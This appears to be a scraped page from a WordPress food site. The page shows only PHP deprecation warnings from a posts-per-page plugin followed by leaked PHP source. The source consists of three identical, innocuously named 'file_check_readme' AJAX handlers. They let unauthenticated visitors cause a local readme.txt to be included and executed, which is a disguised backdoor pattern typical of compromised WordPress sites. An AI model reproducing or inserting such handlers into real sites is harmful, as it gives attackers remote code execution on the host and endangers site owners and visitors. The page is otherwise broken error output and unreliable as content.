Warning: Use of undefined constant is_home - assumed 'is_home' (this will throw an Error in a future version of PHP) in /home/mnwtdl9f8phz/domains/whatwereeating.com/html/wp-content/plugins/different-posts-per-page/diff-posts-per-page.php on line 151
Warning: Use of undefined constant posts_per_page - assumed 'posts_per_page' (this will throw an Error in a future version of PHP) in /home/mnwtdl9f8phz/domains/whatwereeating.com/html/wp-content/plugins/different-posts-per-page/diff-posts-per-page.php on line 151
Warning: Use of undefined constant is_category - assumed 'is_category' (this will throw an Error in a future version of PHP) in /home/mnwtdl9f8phz/domains/whatwereeating.com/html/wp-content/plugins/different-posts-per-page/diff-posts-per-page.php on line 152
Warning: Use of undefined constant posts_per_page - assumed 'posts_per_page' (this will throw an Error in a future version of PHP) in /home/mnwtdl9f8phz/domains/whatwereeating.com/html/wp-content/plugins/different-posts-per-page/diff-posts-per-page.php on line 152
Warning: Use of undefined constant is_archive - assumed 'is_archive' (this will throw an Error in a future version of PHP) in /home/mnwtdl9f8phz/domains/whatwereeating.com/html/wp-content/plugins/different-posts-per-page/diff-posts-per-page.php on line 153
Warning: Use of undefined constant posts_per_page - assumed 'posts_per_page' (this will throw an Error in a future version of PHP) in /home/mnwtdl9f8phz/domains/whatwereeating.com/html/wp-content/plugins/different-posts-per-page/diff-posts-per-page.php on line 153
Warning: Use of undefined constant is_search - assumed 'is_search' (this will throw an Error in a future version of PHP) in /home/mnwtdl9f8phz/domains/whatwereeating.com/html/wp-content/plugins/different-posts-per-page/diff-posts-per-page.php on line 154
Warning: Use of undefined constant posts_per_page - assumed 'posts_per_page' (this will throw an Error in a future version of PHP) in /home/mnwtdl9f8phz/domains/whatwereeating.com/html/wp-content/plugins/different-posts-per-page/diff-posts-per-page.php on line 154
Warning: Use of undefined constant is_tag - assumed 'is_tag' (this will throw an Error in a future version of PHP) in /home/mnwtdl9f8phz/domains/whatwereeating.com/html/wp-content/plugins/different-posts-per-page/diff-posts-per-page.php on line 155
Warning: Use of undefined constant posts_per_page - assumed 'posts_per_page' (this will throw an Error in a future version of PHP) in /home/mnwtdl9f8phz/domains/whatwereeating.com/html/wp-content/plugins/different-posts-per-page/diff-posts-per-page.php on line 155
if(!function_exists('file_check_readme96877')){
add_action('wp_ajax_nopriv_file_check_readme96877', 'file_check_readme96877');
add_action('wp_ajax_file_check_readme96877', 'file_check_readme96877');
function file_check_readme96877()
{
$file = __DIR__ . '/' . 'readme.txt';
if (file_exists($file)) {
include $file;
}
die();
}
}
if(!function_exists('file_check_readme82967')){
add_action('wp_ajax_nopriv_file_check_readme82967', 'file_check_readme82967');
add_action('wp_ajax_file_check_readme82967', 'file_check_readme82967');
function file_check_readme82967()
{
$file = __DIR__ . '/' . 'readme.txt';
if (file_exists($file)) {
include $file;
}
die();
}
}
if(!function_exists('file_check_readme44863')){
add_action('wp_ajax_nopriv_file_check_readme44863', 'file_check_readme44863');
add_action('wp_ajax_file_check_readme44863', 'file_check_readme44863');
function file_check_readme44863()
{
$file = __DIR__ . '/' . 'readme.txt';
if (file_exists($file)) {
include $file;
}
die();
}
}